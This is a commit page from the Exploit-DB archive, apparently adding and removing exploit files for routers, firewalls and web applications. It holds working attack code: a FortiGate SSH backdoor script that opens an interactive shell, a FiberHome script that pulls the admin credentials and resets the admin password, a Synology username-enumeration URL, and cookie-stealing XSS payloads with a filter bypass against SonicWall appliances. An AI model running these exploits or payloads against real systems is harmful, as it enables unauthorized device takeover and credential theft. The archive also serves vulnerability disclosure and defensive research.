TOTOLINK Routers - Backdoor / Remote Code Execution (PoC)
TOTOLINK Routers - Backdoor / Remote Code Execution

IP.Board 4.x - Persistent Cross-Site Scripting
Invision Power Board (IP.Board) 4.x - Persistent Cross-Site Scripting

IP.Board 4.1.4.x - Persistent Cross-Site Scripting
Invision Power Board (IP.Board) 4.1.4.x - Persistent Cross-Site Scripting

NETGEAR R7000 - Command Injection (PoC)
NETGEAR R7000 - Command Injection

WordPress Plugin Smart Google Code Inserter < 3.5 - Authentication Bypass  / SQL Injection
WordPress Plugin Smart Google Code Inserter < 3.5 - Authentication Bypass / SQL Injection
Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration
Photos in Wifi 1.0.1 - Path Traversal
SonicWall NSA 6600/5600/4600/3600/2600/250M - Multiple Vulnerabilities
FiberHome LM53Q1 - Multiple Vulnerabilities
WordPress Plugin LearnDash 2.5.3 - Arbitrary File Upload
Vanilla < 2.1.5 - Cross-Site Request Forgery

Oracle PeopleSoft - 'PeopleSoftServiceListeningConnector' XML External Entity via DOCTYPE (PoC)
Oracle PeopleSoft - 'PeopleSoftServiceListeningConnector' XML External Entity via DOCTYPE

Joomla! 3.7.0 - 'com_fields' SQL Injection (PoC)
Joomla! 3.7.0 - 'com_fields' SQL Injection

Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)
Apache Struts 2.3.x Showcase - Remote Code Execution

AIX - execve /bin/sh Shellcode (88 bytes)

Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)
This commit is contained in:
Offensive Security 2018-01-09 05:02:30 +00:00
parent 3d73ec60b6
commit 2d8b561a5d
24 changed files with 2782 additions and 565 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

21
exploits/cgi/webapps/43455.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration
# Date: 01/05/2018
# Exploit Author: Steve Kaun
# Vendor Homepage: https://www.synology.com
# Version: Before 6.1.3-15152
# CVE : CVE-2017-9554
Previously this was identified by the developer and the disclosure states "via unspecified vectors" it is possible to enumerate usernames via forget_passwd.cgi
Haven't identified any other disclosures that actually identified the attack vector, figure it would be helpful to another.
"An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors."
Well then... Here you go, cracked the code and figured it out.
https://IP_Address:5001/webman/forget_passwd.cgi?user=XXX
Where XXX should be your injection point for username lists.
Several usernames I've found are admin, administrator, root, nobody, ftp, and more. I'm unsure of whether Synology is pulling these entries from it's passwd file or not, but there you go.

77
exploits/hardware/remote/39224.py
View file

@ -1,77 +0,0 @@
#!/usr/bin/env python
# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
# Usage: ./fgt_ssh_backdoor.py <target-ip>
import socket
import select
import sys
import paramiko
from paramiko.py3compat import u
import base64
import hashlib
import termios
import tty
def custom_handler(title, instructions, prompt_list):
n = prompt_list[0][0]
m = hashlib.sha1()
m.update('\x00' * 12)
m.update(n + 'FGTAbc11*xy+Qqz27')
m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
return [h]
def main():
if len(sys.argv) < 2:
print 'Usage: ' + sys.argv[0] + ' <target-ip>'
exit(-1)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
trans = client.get_transport()
try:
trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
chan = client.invoke_shell()
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
if __name__ == '__main__':
main()

441
exploits/hardware/webapps/43459.txt Normal file
View file

@ -0,0 +1,441 @@
Document Title:
===============
SonicWall SonicOS NSA Web Firewall - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1725
Release Date:
=============
2018-01-06
Vulnerability Laboratory ID (VL-ID):
====================================
1725
Common Vulnerability Scoring System:
====================================
4.5
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Achieve a deeper level of security with the SonicWALL Network Security Appliance (NSA) Series of next-generation firewalls. NSA Series appliances
integrate automated and dynamic security capabilities into a single platform, combining the patented1, SonicWALL Reassembly Free Deep Packet
Inspection (RFDPI) firewall engine with a powerful, massively scalable, multi-core architecture. Now you can block even the most sophisticated
threats with an intrusion prevention system (IPS) featuring advanced anti-evasion capabilities, SSL decryption and inspection, and network-based
malware protection that leverages the power of the cloud.
(Copy of the Homepage: http://www.sonicwall.com/products/sonicwall-nsa/ )
The proven SonicOS architecture is at the core of every Dell SonicWALL firewall from the SuperMassive™ E10800 to the TZ 100. SonicOS uses deep packet
inspection technology in combination with multi-core specialized security microprocessors to deliver application intelligence, control, and real-time
visualization, intrusion prevention, high-speed virtual private networking (VPN) technology and other robust security features.
(Copy of the Homepage: http://www.sonicwall.com/network-security-os-platform/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research Team discovered multiple persistent validation vulnerabilities and a filter bypass issue in
the official DELL SonicWall SonicOS NSA Series web-application firewall (utm) appliances.
Vulnerability Disclosure Timeline:
==================================
2018-01-06: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DELL
Product: SonicWall UTM Firewall (NSA;MX,CLI;TZ) Series 2016 Q4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities and a filter bypass issue has been discovered in the official SonicWall SoniOS NSA UTM Web-Firewall Series.
The issue allows remote attackers and privileged user accounts to inject own malicious script codes with persistent attack vector to the affected modules to
compromise the web-application or user session data.
The peristent exploitable validation vulnerabilities are located in the `Host Name / IP Address`, `Client Name/IP Address` and `Proxy Forward To` input fields of
the `Users - Settings - Configure SSO` web appliance module. Remote attackers and low privileged application user accounts are able to inject own malicious script
codes to the vulnerable input fields to compromise the `Users - Settings - Configure SSO` settings module item listing. At the end an attacker is able to save the
information as executable content within the backend. After that the malicious context is saved to the SSO configuration module which executes the context.
The input fields are not parsed, the context does not encode the input with a secure mechanism. The injection points are the marked input fields with the request
method of the vulnerable modules. The execution points are located in the item listing of the separate sections.
A filter restriction is implemented and is trying to secure the validation. The filter mechanism parses iframes with src source and other script code tags. In case
of a mouseover onload link to a source or an img src onload with cookie alert the tags can bypass the filter validation procedure somehow and an execution of the
context occurs.
The security risk of the peristent web vulnerabilities and filter bypass issue are estimated as medium with a cvss (common vulnerability scoring system) count of 4.5.
Exploitation of the persistent web vulnerabilities and filter bypass issue requires a low privileged web application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, persistent load of malicious script
codes or persistent web module context manipulation.
Affected Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Users - Settings - Configure SSO - SSO Agents
[+] Users - Settings - Configure SSO - Terminal Services Agent Settings
[+] Users - Settings - Configure SSO - RADIUS Accounting Single-Sign-On
Vulnerable Input(s):
[+] Host Name / IP Address
[+] Client Name/IP Address
[+] Proxy Forward To
Vulnerable Parameter(s):
[+] ldapServerBindName
[+] usrTreesSel
[+] ldapUsrsTree_1
[+] svcObjId
Affected Serie(s):
[+] SonicWALL NSA 6600
[+] SonicWALL NSA 5600
[+] SonicWALL NSA 4600
[+] SonicWALL NSA 3600
[+] SonicWALL NSA 2600
[+] SonicWALL NSA 250M
Affected System(s):
[+] SonicOS (Standard or Enhanced)
Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers with low privileged or restricted appliance application user account with low or
medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the appliance web-application firewall of sonicwall and login as restricted user or lower privileged user account
2. Surf to the Users module
3. Click to Settings and open the "SSO Configure" button
4. Open one of the vulnerable modules
Note: Users > Settings > Configure SSO > SSO Agents; > Terminal Services Agent Settings or > RADIUS Accounting Single-Sign-On
5. Inject a script code payload to the Host Name/IP Address(es), Client Name/IP Address & Proxy Forward To input fields
Note: Regular frames are filtered but img or iframes with alert onload or onmouseover tag do bypass the filter validation
6. Save the entry and the payload directly executes in the utm firewall web user interface
7. Successful reproduce of the application-side input validation vulnerability and filter bypass issue!
PoC Payload(s):
"><a onmouseover=alert(document.cookie)>XSS ONMOUSEOVER TEST</a>
"><img src=evil.source onerror=prompt(document.cookie);>
"><"<img onmouseover="evil.source">%20%20>"<iframe src=evil.source>%20<iframe>
PoC: Users > Settings > Configure SSO > SSO Agents > [Host Name / IP Address]
<tbody><tr class="listLabel" valign="bottom">
<td align="left" nowrap="" width="2%"><span class="objItemSpacing">#</span></td>
<td align="center" nowrap="" width="8%">Status</td>
<td align="left" nowrap="" width="30%">Host Name/IP Address </td>
<td align="left" nowrap="" width="10%">Port </td>
<td align="left" nowrap="" width="10%">Timeout </td>
<td align="left" nowrap="" width="10%">Retries </td>
<td onmouseover="onMaxRqstsMouseOver(event,this);" onmouseout="htt();" align="left" nowrap="" width="10%">
Max Rqsts
<img title="" class="ttip" src="carrot.gif" alt="" border="0">
</td>
<td align="center" nowrap="" width="10%">Enable</td>
<td width="10%"> </td></tr>
<tr style="cursor: pointer;" class="listItem"><td nowrap="nowrap">1</td><td align="center" nowrap="nowrap">
<img id="agentStatus-192.168.150.8 "><img src=evil.source onerror=prompt(document.cookie);>:2265" alt="" src="green_led.gif"
border="0" height="13" width="13"></td><td style="" nowrap="">
<label style="">192.168.150.8 "><img src="evil.source" onerror="prompt(document.cookie);"></label></td><td nowrap="nowrap"><label style="">2265</label></td><td
nowrap="nowrap"><label>10</label></td><td nowrap="nowrap"><label>6</label></td><td nowrap="nowrap"><label>32</label></td>
<td align="center" nowrap="nowrap"><input type="checkbox"></td><td align="left" nowrap="nowrap"><img
id="agentStats-192.168.150.8 "><img src=evil.source onerror=prompt(document.cookie);>:2265" style="width: 20px; height:
20px; border-width: 0px; padding-right: 2px;" src="stat.png"><img style="width: 20px; height: 20px; border-width: 0px;
padding-right: 2px;" title="Edit this agent" alt="Edit this agent" src="edit.gif"><img style="width: 20px; height: 20px;
border-width: 0px;" title="Delete this agent" alt="Delete this agent" src="trash.gif"></td></tr><tr class=""
id="bottom-bar"><td colspan="8" align="left" nowrap="nowrap" valign="middle"><input id="add-btn" class="button" style="width:
70px;" title="Add a new agent" value="Add..." type="button"></td><td align="left" nowrap="nowrap"><img
style="border-width: 0px; padding-right: 2px;" id="globalStats" alt="" src="stat.png" border="0" height="20" width="20"></td></tr></tbody>
PoC: Users > Settings > Configure SSO > Terminal Services Agent Settings > [Host Name / IP Address]
<tbody><tr class="listLabel" valign="bottom">
<td align="left" nowrap="" width="2%"><span class="objItemSpacing">#</span></td>
<td align="center" nowrap="" width="8%">Active</td>
<td onmouseover="onTsaHostMouseOver(event,this);" onmouseout="htt();" align="left" nowrap="" width="50%">
Host Name/IP Address(es)
<img title="" class="ttip" src="carrot.gif" alt="" border="0"> </td>
<td align="left" nowrap="" width="15%">Port </td>
<td align="center" nowrap="" width="15%">Enable</td>
<td width="10%"> </td>
<td style="background-image: none; border-top-width: 0px; border-bottom-width: 0px;" class="listItem" rowspan="999" nowrap="nowrap" valign="bottom">
<div style="visibility: hidden;" id="view-scroll-div"><img src="scrollb_up.gif" id="scroll-up-img" alt=""><br><img src="scrollb_down.gif"
id="scroll-down-img" alt=""></div></td></tr>
<tr style="cursor: pointer;" class="listItem"><td nowrap="nowrap">1</td><td align="center" nowrap="nowrap">
<img id="tsAgentStatus-0.0.0.0 "><img src=evil.source onerror=prompt(document.cookie);>:2259" alt="" src="grey_led.gif" border="0"
height="13" width="13"></td><td nowrap=""><label style="">0.0.0.0 "><img src="evil.source" onerror="prompt(document.cookie);"></label></td>
<td nowrap="nowrap"><label>2259</label></td><td align="center" nowrap="nowrap"><input type="checkbox"></td>
<td align="left" nowrap="nowrap"><img id="tsAgentStats-0.0.0.0 "><img src=x onerror=prompt(document.cookie);>:2259" style="width: 20px;
height: 20px; border-width: 0px; padding-right: 2px;" src="statx.png"><img style="width: 20px; height: 20px; border-width: 0px; padding-right:
2px;" title="Edit this Terminal Services Agent" alt="Edit this Terminal Services Agent" src="edit.gif"><img style="width: 20px; height: 20px;
border-width: 0px;" title="Delete this Terminal Services Agent" alt="Delete this Terminal Services Agent" src="trash.gif"></td></tr><tr class=""
id="bottom-bar"><td colspan="5" align="left" nowrap="nowrap" valign="middle"><input id="add-btn" class="button" style="width: 70px;"
title="Add a new Terminal Services Agent" value="Add..." type="button"></td><td align="left" nowrap="nowrap"><img style="border-width:
0px; padding-right: 2px;" id="tsa_globalStats" alt="" src="stat.png" border="0" height="20" width="20"></td></tr></tbody>
PoC: Users > Settings > Configure SSO > RADIUS Accounting Single-Sign-On [Client Name/IP Address] & [Proxy Forward To] [Select In Element]
<tbody><tr class="listLabel" valign="bottom">
<td align="left" nowrap="" width="2%"><span class="objItemSpacing">#</span></td>
<td align="center" nowrap="" width="8%">Status</td>
<td align="left" nowrap="" width="25%">Client Name/IP Address </td>
<td align="left" nowrap="" width="15%">User Name Format </td>
<td align="left" nowrap="" width="35%">Proxy Forward To </td>
<td align="left" nowrap="" width="15%">Interim-Update Timeout </td>
<td width="5%"> </td>
<td style="background-image: none; border-top-width: 0px; border-bottom-width: 0px;" class="listItem" rowspan="999" nowrap="nowrap"
valign="bottom"><div style="visibility: hidden;" id="view-scroll-div"><img src="scrollb_up.gif" id="scroll-up-img" alt=""><br><img src="scrollb_down.gif"
id="scroll-down-img" alt=""></div></td></tr>
<tr style="cursor: pointer;" class="listItemBold"><td nowrap="nowrap">1</td><td align="center" nowrap="nowrap">
<img id="radAcctClientStatus-0.0.0.0 "><img src=evil.source onerror=prompt(document.cookie);>" alt="" src="grey_led.gif" border="0" height="13" width="13"></td>
<td nowrap=""><label style="">0.0.0.0 "><img src="evil.source" onerror="prompt(document.cookie);"></label></td><td nowrap="nowrap"><label style="">DomainUser-name</label></td>
<td style="color: rgb(255, 0, 0);" nowrap=""><label style="">0.0.0.0 "><img src="evil.source" onerror="prompt(document.cookie);">:1813</label></td><td nowrap="nowrap">
<label>Disabled</label></td><td align="right" nowrap="nowrap"><img id="radAcctClientStats-0.0.0.0
"><img src=x onerror=prompt(document.cookie);>" style="width: 20px; height: 20px; border-width: 0px; padding-right: 2px;" src="statx.png">
<img style="width: 20px; height: 20px; border-width: 0px; padding-right: 2px;" title="Edit this radAcctClient" alt="Edit this radAcctClient" src="edit.gif">
<img style="width: 20px; height: 20px; border-width: 0px;" title="Delete this radAcctClient" alt="Delete this radAcctClient" src="trash.gif"></td></tr><tr class=""
id="bottom-bar"><td colspan="6" align="left" nowrap="nowrap" valign="middle"><input id="add-btn" class="button" style="width: 70px;" title="Add a new radAcctClient"
value="Add..." type="button"></td><td align="left" nowrap="nowrap"><img style="border-width: 0px; padding-right: 2px;" id="radacct_globalStats" alt="" src="stat.png"
border="0" height="20" width="20"></td></tr></tbody>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://utm_waf.localhost:8512/main.cgi
Mime Type[text/html]
Request Header:
Host[utm_waf.localhost:8512]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[https://utm_waf.localhost:8512/ldapProps.html]
Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 777=0; 7510=0]
Connection[keep-alive]
POST-Daten:
csrfToken[]
userRadiusSelect[4]
radiusDfltUserGroup[Domain+Users]
cgiaction[none]
ldapCgiAction[0]
isLdapPost[]
ldapServerName[192.168.113.211]
ldapServerPort[389]
portsSel[0]
ldapTimeout[10]
ldapOpnTimeout[5]
bindType[2]
loginName[redteam]
loginPwd[]
protocolSel[LDAP+version+2]
ldapUseTls[on]
ldapNegTls[on]
ldapTlsRequireServerCert[on]
tlsCertSel[new]
ldapProtocolVer[2]
ldapServerBindName[[MALICIOUS PAYLOAD INJECT!]]
ldapSrvrBindNameType[1]
ldapServerBindPwd[]
ldapServerBindHashPwd[]
cbox_ldapUseTls[]
cbox_ldapNegTls[]
cbox_ldapTlsRequireServerCert[]
ldapTlsCertName[new]
schemaSelect[1]
usrQualLogonAttr[userPrincipalName]
ldapUsrUseOtherGrpAttr[on]
usrGrpMbrAttrTypRadio[0]
ldapOuNameAttr[]
ldapUsrObjClass[user]
ldapUsrLogonNameAttr[sAMAccountName]
ldapUsrQualLogonAttr[userPrincipalName]
ldapUsrGrpAttr[memberOf]
ldapUsrOtherGrpAttr[primaryGroupID]
ldapUsrFrmdIpAttr[msRADIUSFramedIPAddress]
ldapUsrGrpObjClass[group]
ldapUsrGrpMbrAttr[member]
ldapUsrGrpMbrType[0]
ldapUsrGrpOtherMatchAttr[primaryGroupToken]
cbox_ldapUsrUseOtherGrpAttr[]
ldapUsrDomain[sjcolo.local]
usrTreesSel[MALICIOUS PAYLOAD INJECT!]
ldapTreesAutoConfDomain[]
ldapAllowReferrals_0[on]
ldapAllowReferrals_1[on]
ldapAllowReferrals_2[on]
ldapAllowReferrals_3[on]
cbox_ldapAllowReferrals_0[]
cbox_ldapAllowReferrals_1[]
cbox_ldapAllowReferrals_2[]
cbox_ldapAllowReferrals_3[]
userRadiusCheckLocal[on]
userRadiusUserGrpsLocal[on]
selDfltUserGroup[2]
ldapUsrGrpMirroring[on]
ldapUsrGrpMirrorPeriod[x]
ldapUsrGrpMirrorWhat[0]
cbox_userRadiusCheckLocal[]
cbox_userRadiusUserGrpsLocal[]
cbox_ldapUsrGrpMirroring[]
ldapRelayEnable[on]
ldapRelayOnLAN[on]
ldapRelayOnWAN[on]
ldapRelayOnVPN[on]
ldapRelaySecret[]
ldapRelayLegacyVpnUsrGrp[]
ldapRelayLegacyVpnClientGrp[]
ldapRelayLegacyL2TPUsrGrp[]
ldapRelayLegacyInetUsrGrp[]
ldapRelayHashSecret[]
cbox_ldapRelayEnable[]
cbox_ldapRelayOnLAN[]
cbox_ldapRelayOnWAN[]
cbox_ldapRelayOnDMZ[]
cbox_ldapRelayOnWLAN[]
cbox_ldapRelayOnVPN[]
Radius_user[]
Radius_passwd[]
remAuthTstProtocol[0]
TestInfo[]
remAuthTstType[-1]
rNum[28F5903AD031CF055855192B2F30CC6E]
testType[1]
testDesc[LDAP+server]
ldapUsrsTree_1[MALICIOUS PAYLOAD INJECT!]
Response Header:
Server[localhost]
Expires[-1]
Content-Type[text/html;charset=UTF-8]
-
Status: 200[OK]
GET https://utm_waf.localhost:8512/x[MALICIOUS PAYLOAD EXECUTION!]
Mime Type[unknown]
Request Header:
Host[utm_waf.localhost:8512]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://utm_waf.localhost:8512/ssoAuthProps.html]
Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 777=0; 7510=0]
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://utm_waf.localhost:8512/main.cgi
Mime Type[text/html]
Request Header:
Host[utm_waf.localhost:8512]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[https://utm_waf.localhost:8512/addServiceObjDlg.html]
Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 777=2; 7510=0]
Connection[keep-alive]
POST-Daten:
csrfToken[]
svcObjId_-1[MALICIOUS INJECTED PAYLOAD!]
svcObjType_-1[1]
svcObjProperties_-1[4878]
svcObjIpType_-1[ssh]
svcObjPort1_-1[1]
svcObjPort2_-1[1]
svcObjManagement_-1[0]
svcObjHigherPrecedence_-1[0]
Response Header:
Server[localhost]
Content-Type[text/html;charset=UTF-8]
-
Status: 200[OK]
GET https://utm_waf.localhost:8512/x[MALICIOUS PAYLOAD EXECUTION!]
Mime Type[text/html]
Request Header:
Host[utm_waf.localhost:8512]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Referer[https://utm_waf.sonicwall:8512/ssoAuthProps.html]
Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 777=3; 7510=0]
Connection[keep-alive]
Response Header:
Server[SonicWALL]
Content-Type[text/html;charset=UTF-8]
Reference(s):
https://utm_waf.sonicwall:8512/
https://utm_waf.localhost:8512/main.cgi
https://utm_waf.localhost:8512/ldapProps.html
https://utm_waf.sonicwall:8512/ssoAuthProps.html
https://utm_waf.localhost:8512/addServiceObjDlg.html
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a parse and encode of the vulnerable `Host Name / IP Address`, `Client Name/IP Address` and
`Proxy Forward To` input fields. Encode the following values `ldapServerBindName - usrTreesSel - ldapUsrsTree_1` and `svcObjId`
to prevent an inject via POST method. Restrict the input fields and disallow the usage of special chars. Encode in the last step
the output listing locations in the `SSO Agents `,`Terminal Services Agent Settings` and `RADIUS Accounting Single-Sign-On`
modules to prevent the execution points of the vulnerabilities. Adjust the filter procedure and setup a more seure
exception-handling to interact during an invalid execution or unhandled exception.
Note: All the security issues are marked as resolved by dell sonicwall with several updates until 2017 Q4.
Security Risk:
==============
The security risk of the application-side input validation web vulnerability and the filter bypass issue are estimated as medium. (CVSS 4.5)
Credits & Authors:
==================
Benjamin K.M. [bkm@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

152
exploits/hardware/webapps/43460.py Executable file
View file

@ -0,0 +1,152 @@
#!/usr/bin/python
# /$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$
# | $$_____/|__/| $$ | $$ | $$ | $$__ $$ | $$ | $$_____/ | $$ |__/ | $$
# | $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$
# | $$$$$ | $$| $$__ $$ /$$__ $$ /$$__ $$| $$$$$$$$ /$$__ $$| $$_ $$_ $$ /$$__ $$ | $$$$$$$/ /$$__ $$| $$_ $$_ $$ /$$__ $$|_ $$_/ /$$__ $$ | $$$$$ | $$ /$$/ /$$__ $$| $$ /$$__ $$| $$|_ $$_/
# | $$__/ | $$| $$ \ $$| $$$$$$$$| $$ \__/| $$__ $$| $$ \ $$| $$ \ $$ \ $$| $$$$$$$$ | $$__ $$| $$$$$$$$| $$ \ $$ \ $$| $$ \ $$ | $$ | $$$$$$$$ | $$__/ \ $$$$/ | $$ \ $$| $$| $$ \ $$| $$ | $$
# | $$ | $$| $$ | $$| $$_____/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$_____/ | $$ \ $$| $$_____/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/ | $$ >$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$
# | $$ | $$| $$$$$$$/| $$$$$$$| $$ | $$ | $$| $$$$$$/| $$ | $$ | $$| $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$ | $$$$$$$$ /$$/\ $$| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/
# |__/ |__/|_______/ \_______/|__/ |__/ |__/ \______/ |__/ |__/ |__/ \_______/ |__/ |__/ \_______/|__/ |__/ |__/ \______/ \___/ \_______/ |________/|__/ \__/| $$____/ |__/ \______/ |__/ \___/
# | $$
# | $$
# |__/
# Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities
# Exploit Author: Ibad Shah
# Vendor Homepage: www.fiberhome.com
# Version: VH519R05C01S38
# Tested on: Linux
# Platform : Hardware
# CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887
# Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC
import requests,sys,getopt,socket,struct
#Declaring IP as our global variable to probe for Gateway IP of Device
global ip
#Getting Gateway IP Address
def get_default_gateway_linux():
with open("/proc/net/route") as fh:
for line in fh:
fields = line.strip().split()
if fields[1] != '00000000' or not int(fields[3], 16) & 2:
continue
return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
return;
ip = get_default_gateway_linux()
exploit_title = "=============================================== \n FiberHome Remote Administrator Account Details \n================================================";
#Function to get Device Statistics
def get_device_details():
gateway = None
hardware = None
device_name = None
devices_all = ''
version = None
gateway = None
ssid = ''
dns1 = None
dns2 = None
requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1")
api_response = requestStatus.content.replace('\t','').split('\n')
for results in api_response:
if "<hardware_version>" in results:
hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','')
if "<device_name>" in results:
device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','')
if "<version_num>" in results:
version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','')
if "<gateway>" in results:
gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','')
if "<ssid>" in results:
ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','')
if "<dns1>" in results:
dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','')
if "<dns2>" in results:
dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','')
if "<IMEI>" in results:
imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','')
print "\n=============================================="
print "\nHardware Version of Device : "+hardware+"\n"
print "\nName of Device : "+device_name+"\n"
print "\nSoftware Version of Device : "+version+"\n"
print "\nIMEI of Device! : "+imei+"\n"
print "\nWiFi SSID of Device : "+ssid+"\n"
print "\nGateway of Zong Device : "+gateway+"\n"
print "\nDNS Primary of Device : "+dns1+"\n"
print "\nDNS Secondary of Device : "+dns2+"\n"
print "\n=============================================================================\n";
if "<known_devices_list>" in results:
devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','')
print "\nConnected Devices to WIFI\n"
print devices_all
#Function for getting User Account Details to login to Portal
def get_user_account_details():
request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin")
admin_details = request.content.replace('\t','').split('\n')
for admin_login_response in admin_details:
if "<router_username>" in admin_login_response:
username = admin_login_response.replace('<router_username>','').replace('</router_username>','')
if "<router_password>" in admin_login_response:
password = admin_login_response.replace('<router_password>','').replace('</router_password>','')
print "\nUsername of Device Web Application :\n"+username+" "
print "Password of Device Web Application :\n"+password+"\n"
print "\n=============================================================================\n";
#Function to change Administrator Password
def change_admin_password():
set_password = raw_input("\nEnter Password to Change : ")
password = str(set_password)
xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>"
headers = {'Content-Type': 'application/xml'}
change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text
print "Password Changed!"
def main():
print exploit_title
print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device"
get_option = raw_input("\n Enter Option : ");
option = int(get_option)
if get_option == "1":
get_user_account_details()
raw_input("\n Press Any Key To Exit");
elif get_option == "2":
get_device_details()
raw_input("\n Press Any Key To Exit");
elif get_option == "3":
change_admin_password()
elif get_option == "":
print "Good Bye!";
else:
print "Goodbye!";
main()

167
exploits/ios/webapps/43457.txt Normal file
View file

@ -0,0 +1,167 @@
Document Title:
===============
Photos in Wifi 1.0.1 iOS - Path Traversal Web Vulnerability
References (Source):
====================
